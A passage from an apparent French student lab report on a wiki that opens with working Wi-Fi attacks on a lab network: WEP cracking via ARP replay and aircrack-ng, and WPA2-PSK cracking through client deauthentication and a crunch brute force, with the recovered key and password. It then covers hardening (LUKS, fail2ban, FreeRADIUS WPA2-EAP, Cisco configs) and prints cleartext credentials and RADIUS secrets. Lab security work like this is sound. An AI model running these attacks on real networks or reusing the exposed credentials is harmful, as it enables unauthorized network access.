    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Authentification fake (association au point d’accès) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Attaque ARP replay pour générer du trafic :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aircrack-ng capture_wep-01.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La clé WEP a été trouvée en moins de 15 minutes : &amp;lt;code&amp;gt;FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Cassage de mot de passe WPA‑PSK par force brute ==&lt;br /&gt;
Le réseau &amp;lt;code&amp;gt;kracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;44:AD:D9:5F:87:00&amp;lt;/code&amp;gt;, canal 13) utilisait WPA2‑PSK.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Désauthentification d’un client (identifié &amp;lt;code&amp;gt;40:A5:EF:01:25:8B&amp;lt;/code&amp;gt;) pour forcer un handshake :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après apparition du message '''“WPA handshake”''' dans &amp;lt;code&amp;gt;airodump‑ng&amp;lt;/code&amp;gt;, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Résultat : le mot de passe &amp;lt;code&amp;gt;66689666&amp;lt;/code&amp;gt; a été découvert après environ 30 minutes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Sécurisations =&lt;br /&gt;
&lt;br /&gt;
== Chiffrement de données ==&lt;br /&gt;
Sur Moon, une partition supplémentaire (disque virtuel &amp;lt;code&amp;gt;xvdb&amp;lt;/code&amp;gt;, correspondant au volume LVM &amp;lt;code&amp;gt;SE4.Moon.home&amp;lt;/code&amp;gt;) a été chiffrée avec LUKS.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Chiffrement de la partition&lt;br /&gt;
cryptsetup luksFormat /dev/xvdb&lt;br /&gt;
&lt;br /&gt;
# Ouverture du conteneur&lt;br /&gt;
cryptsetup open /dev/xvdb home_crypt&lt;br /&gt;
&lt;br /&gt;
# Création d’un système de fichiers&lt;br /&gt;
mkfs.ext4 /dev/mapper/home_crypt&lt;br /&gt;
&lt;br /&gt;
# Montage manuel&lt;br /&gt;
mount /dev/mapper/home_crypt /mnt/secret&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour automatiser le montage au démarrage, on ajoute dans &amp;lt;code&amp;gt;/etc/crypttab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
home_crypt /dev/xvdb none luks&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
et dans &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/mapper/home_crypt /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.&lt;br /&gt;
&lt;br /&gt;
== Filtrage des services – fail2ban ==&lt;br /&gt;
Pour protéger SSH et les requêtes DNS malveillantes, &amp;lt;code&amp;gt;fail2ban&amp;lt;/code&amp;gt; a été installé sur Moon et Solstice.&lt;br /&gt;
&lt;br /&gt;
Fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[DEFAULT]&lt;br /&gt;
bantime = 3600&lt;br /&gt;
findtime = 600&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
logpath = /var/log/auth.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[named-refused-tcp]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = domain,953&lt;br /&gt;
protocol = tcp&lt;br /&gt;
filter = named-refused&lt;br /&gt;
logpath = /var/log/named/security.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Filtre &amp;lt;code&amp;gt;/etc/fail2ban/filter.d/named-refused.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[Definition]&lt;br /&gt;
failregex = ^\S+ named\[\d+\]: client &amp;lt;HOST&amp;gt;#\S+ .* query .* denied&lt;br /&gt;
ignoreregex =&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le service est démarré et activé :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl enable fail2ban&lt;br /&gt;
systemctl restart fail2ban&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation WiFi par WPA2‑EAP ==&lt;br /&gt;
&lt;br /&gt;
=== Serveur FreeRADIUS sur Moon ===&lt;br /&gt;
Installation :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt install freeradius freeradius-utils -y&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ajout du client (point d’accès) dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client vlan1_ap1 {&lt;br /&gt;
    ipaddr = 172.27.0.4    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap1-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
client vlan1_ap2 {&lt;br /&gt;
    ipaddr = 172.27.0.3    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap2-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création d’un utilisateur dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;msalhi&amp;quot; Cleartext-Password := &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
&amp;quot;etudiant1&amp;quot; Cleartext-Password := &amp;quot;Password123&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;quot;prof&amp;quot; Cleartext-Password := &amp;quot;AdminSE4!&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration EAP pour PEAP‑MSCHAPv2 dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt; (type par défaut &amp;lt;code&amp;gt;peap&amp;lt;/code&amp;gt;, tunnel intérieur &amp;lt;code&amp;gt;mschapv2&amp;lt;/code&amp;gt;).  &lt;br /&gt;
Un conflit de port (18120) a été résolu en commentant la section &amp;lt;code&amp;gt;listen&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/sites-enabled/inner-tunnel&amp;lt;/code&amp;gt; (ou en mettant &amp;lt;code&amp;gt;port = 0&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
Test local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 0 testing123&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76&lt;br /&gt;
	User-Name = &amp;quot;msalhi&amp;quot;&lt;br /&gt;
	User-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
	NAS-IP-Address = 127.0.0.1&lt;br /&gt;
	NAS-Port = 0&lt;br /&gt;
	Message-Authenticator = 0x00&lt;br /&gt;
	Cleartext-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
→ réponse &amp;lt;code&amp;gt;Access-Accept&amp;lt;/code&amp;gt; attendue.&lt;br /&gt;
&lt;br /&gt;
=== Configuration du point d’accès WiFi ===&lt;br /&gt;
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
aaa group server radius radius_student25&lt;br /&gt;
 server 192.168.20.2 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
aaa authentication login eap_student25 group radius_student25&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_15&lt;br /&gt;
 vlan 25&lt;br /&gt;
 authentication open eap eap_student25&lt;br /&gt;
 authentication network-eap eap_student25&lt;br /&gt;
 authentication key-management wpa version 2&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
 encryption vlan 25 mode ciphers aes-ccm&lt;br /&gt;
 ssid VM_SERVICES_15&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configuration DHCP sur les routeurs ===&lt;br /&gt;
Sur '''E304''' (plage 100‑150) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 10.60.15.1 10.60.15.99&lt;br /&gt;
ip dhcp excluded-address 10.60.15.151 10.60.15.254&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool SALHI_VLAN25&lt;br /&gt;
 network 10.60.15.0 255.255.255.0&lt;br /&gt;
 default-router 10.60.15.1&lt;br /&gt;
 dns-server 192.168.20.2 8.8.8.8&lt;br /&gt;
 domain-name msalhi.online&lt;br /&gt;
 lease 0 12&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Policy‑Based Routing (PBR) ===&lt;br /&gt;
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip access-list extended TRAFIC_VLAN25&lt;br /&gt;
 permit ip 10.60.15.0 0.0.0.255 any&lt;br /&gt;
!&lt;br /&gt;
route-map PBR_VLAN25 permit 10&lt;br /&gt;
 match ip address TRAFIC_VLAN25&lt;br /&gt;
 set ip next-hop 193.48.57.167&lt;br /&gt;
!&lt;br /&gt;
interface Vlan25&lt;br /&gt;
 ip policy route-map PBR_VLAN25&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests ===&lt;br /&gt;
Un client connecté au SSID &amp;lt;code&amp;gt;VM_SERVICES_15&amp;lt;/code&amp;gt; obtient une adresse IP dans la plage DHCP (ex. &amp;lt;code&amp;gt;10.60.15.101&amp;lt;/code&amp;gt;), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (&amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
= Vérifications et tests =&lt;br /&gt;
&lt;br /&gt;
Cette section regroupe l’ensemble des commandes exécutées pour valider le bon fonctionnement de chaque composant de l’infrastructure. Les sorties sont présentées telles qu’obtenues sur les machines concernées.&lt;br /&gt;
&lt;br /&gt;
== Services Web ==&lt;br /&gt;
&lt;br /&gt;
=== Sur Moon (machine de services) ===&lt;br /&gt;
Vérification de l’écoute Apache sur les ports 80 et 443 :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ss -tlnp | grep -E ':80|:443'&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
LISTEN 0      128                                          *:80              *:*    users:((&amp;quot;apache2&amp;quot;,pid=16838,fd=4),(&amp;quot;apache2&amp;quot;,pid=16837,fd=4),(&amp;quot;apache2&amp;quot;,pid=7274,fd=4))&lt;br /&gt;
LISTEN 0      128                                          *:443             *:*    users:((&amp;quot;apache2&amp;quot;,pid=16838,fd=6),(&amp;quot;apache2&amp;quot;,pid=16837,fd=6),(&amp;quot;apache2&amp;quot;,pid=7274,fd=6))&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test d’accès HTTPS en local (IPv6) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
curl -6 https://msalhi.online -I&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Fri, 27 Feb 2026 11:04:38 GMT&lt;br /&gt;
Server: Apache/2.4.66 (Debian)&lt;br /&gt;
Strict-Transport-Security: max-age=63072000; includeSubDomains&lt;br /&gt;
X-Frame-Options: DENY&lt;br /&gt;
X-Content-Type-Options: nosniff&lt;br /&gt;
X-XSS-Protection: 1; mode=block&lt;br /&gt;
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT&lt;br /&gt;
ETag: &amp;quot;1515-64a2d916615c9&amp;quot;&lt;br /&gt;
Accept-Ranges: bytes&lt;br /&gt;
Content-Length: 5397&lt;br /&gt;
Vary: Accept-Encoding&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sur Solstice (machine mandataire) ===&lt;br /&gt;
Test d’accès HTTPS via le proxy inverse (IPv4) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
curl -4 https://msalhi.online -I&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Fri, 27 Feb 2026 11:04:55 GMT&lt;br /&gt;
Server: Apache/2.4.66 (Debian)&lt;br /&gt;
Strict-Transport-Security: max-age=63072000; includeSubDomains&lt;br /&gt;
X-Frame-Options: DENY&lt;br /&gt;
X-Content-Type-Options: nosniff&lt;br /&gt;
X-XSS-Protection: 1; mode=block&lt;br /&gt;
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT&lt;br /&gt;
ETag: &amp;quot;1515-64a2d916615c9&amp;quot;&lt;br /&gt;
Accept-Ranges: bytes&lt;br /&gt;
Content-Length: 5397&lt;br /&gt;
Vary: Accept-Encoding&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification des règles NAT :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -L POSTROUTING -n -v&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Chain POSTROUTING (policy ACCEPT 8219 packets, 528K bytes)&lt;br /&gt;
 pkts bytes target     prot opt in     out     source               destination         &lt;br /&gt;
18528 1577K MASQUERADE  0    --  *      eth1    0.0.0.0/0            0.0.0.0/0           &lt;br /&gt;
 3254  225K MASQUERADE  0    --  *      eth0    10.60.15.0/24        0.0.0.0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La première règle assure la mascarade pour tout le trafic sortant sur l’interface publique (eth1). La seconde règle (source 10.60.15.0/24 sortant sur eth0) est résiduelle mais ne perturbe pas le fonctionnement.&lt;br /&gt;
&lt;br /&gt;
== fail2ban ==&lt;br /&gt;
&lt;br /&gt;
=== Sur Solstice ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
fail2ban-client status sshd&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Status for the jail: sshd&lt;br /&gt;
|- Filter&lt;br /&gt;
|  |- Currently failed:	0&lt;br /&gt;
|  |- Total failed:	12792&lt;br /&gt;
|  `- File list:	/var/log/auth.log&lt;br /&gt;
`- Actions&lt;br /&gt;
   |- Currently banned:	4&lt;br /&gt;
   |- Total banned:	3114&lt;br /&gt;
   `- Banned IP list:	134.199.155.127 162.243.33.174 152.42.166.201 206.189.90.119&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sur Moon ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
fail2ban-client status sshd&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Status for the jail: sshd&lt;br /&gt;
|- Filter&lt;br /&gt;
|  |- Currently failed:	0&lt;br /&gt;
|  |- Total failed:	1&lt;br /&gt;
|  `- File list:	/var/log/auth.log&lt;br /&gt;
`- Actions&lt;br /&gt;
   |- Currently banned:	0&lt;br /&gt;
   |- Total banned:	0&lt;br /&gt;
   `- Banned IP list:	&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== WPA2‑EAP – FreeRADIUS (sur Moon) ==&lt;br /&gt;
Statut du service :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl status freeradius&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
● freeradius.service - FreeRADIUS multi-protocol policy server&lt;br /&gt;
   Loaded: loaded (/lib/systemd/system/freeradius.service; enabled)&lt;br /&gt;
   Active: active (running) since ...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test d’authentification local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 1812 testing123&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76&lt;br /&gt;
	User-Name = &amp;quot;msalhi&amp;quot;&lt;br /&gt;
	User-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
	NAS-IP-Address = 127.0.0.1&lt;br /&gt;
	NAS-Port = 0&lt;br /&gt;
	Message-Authenticator = 0x00&lt;br /&gt;
	Cleartext-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du client RADIUS (point d’accès) extraite de &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client vlan1_ap1 {&lt;br /&gt;
    ipaddr = 172.27.0.4&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap1-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
client vlan1_ap2 {&lt;br /&gt;
    ipaddr = 172.27.0.3&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap2-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== WPA2‑EAP – Point d’accès (wifi‑E304) ==&lt;br /&gt;
Connexion SSH (commande adaptée) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification du SSID et de son VLAN :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show dot11 ssid VM_SERVICES_15&lt;br /&gt;
SSID Name                : VM_SERVICES_15&lt;br /&gt;
Status                   : Enabled&lt;br /&gt;
Broadcast SSID           : Enabled&lt;br /&gt;
VLAN                     : 25&lt;br /&gt;
Authentication Methods   : Open EAP, Network-EAP&lt;br /&gt;
WPA Key Management       : WPA2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification des serveurs RADIUS configurés :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show running-config | include radius-server&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key 7 044F0E151B284249584B56&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Statistiques RADIUS :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show aaa servers&lt;br /&gt;
RADIUS: id 7, priority 6, host 192.168.20.2, auth-port 1812, acct-port 1813&lt;br /&gt;
     State: current UP, duration 794495s&lt;br /&gt;
     Authen: request 2076, timeouts 1646&lt;br /&gt;
             Transaction: success 430, failure 411&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test d’authentification :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#test aaa group radius_student25 msalhi WifiSecure2026! legacy&lt;br /&gt;
Attempting authentication test to server-group radius_student25 using radius&lt;br /&gt;
User was successfully authenticated.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Clients associés :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show dot11 associations&lt;br /&gt;
802.11 Client Stations on Dot11Radio1: &lt;br /&gt;
SSID [VM_SERVICES_15] : &lt;br /&gt;
MAC Address    IP address      Device        Name            Parent         State     &lt;br /&gt;
a0b3.395a.dcc8 10.60.15.153    unknown       -               self           EAP-Assoc&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
État du VLAN 25 sur l’AP :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show vlan 25&lt;br /&gt;
Virtual LAN ID:  25 (IEEE 802.1Q Encapsulation)&lt;br /&gt;
   vLAN Trunk Interfaces:  Dot11Radio0.25, Dot11Radio1.25, GigabitEthernet0.25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== WPA2‑EAP – Routeur central (C9200‑E304) ==&lt;br /&gt;
Connexion SSH (commande adaptée) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification du VLAN 25 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show vlan brief | include 25&lt;br /&gt;
25   E15-MSalhi                       active&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Interface VLAN 25 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show ip interface brief | include Vlan25&lt;br /&gt;
Vlan25                 10.60.15.2      YES manual up                    up&lt;br /&gt;
C9200-E304#show ipv6 interface brief | include Vlan25&lt;br /&gt;
Vlan25                 [up/up]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
VRRP pour VLAN 25 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show vrrp brief | include 25&lt;br /&gt;
Vl25                25 IPv4 110     0  N   Y  MASTER  10.60.15.2(local) 10.60.15.1&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show vrrp Vlan25&lt;br /&gt;
Vlan25 - Group 25 - Address-Family IPv4&lt;br /&gt;
  State is MASTER&lt;br /&gt;
  Virtual IP address is 10.60.15.1&lt;br /&gt;
  Priority is 110&lt;br /&gt;
  Master Router is 10.60.15.2 (local)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
DHCP :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show ip dhcp pool&lt;br /&gt;
...&lt;br /&gt;
Pool PoolSalhi :&lt;br /&gt;
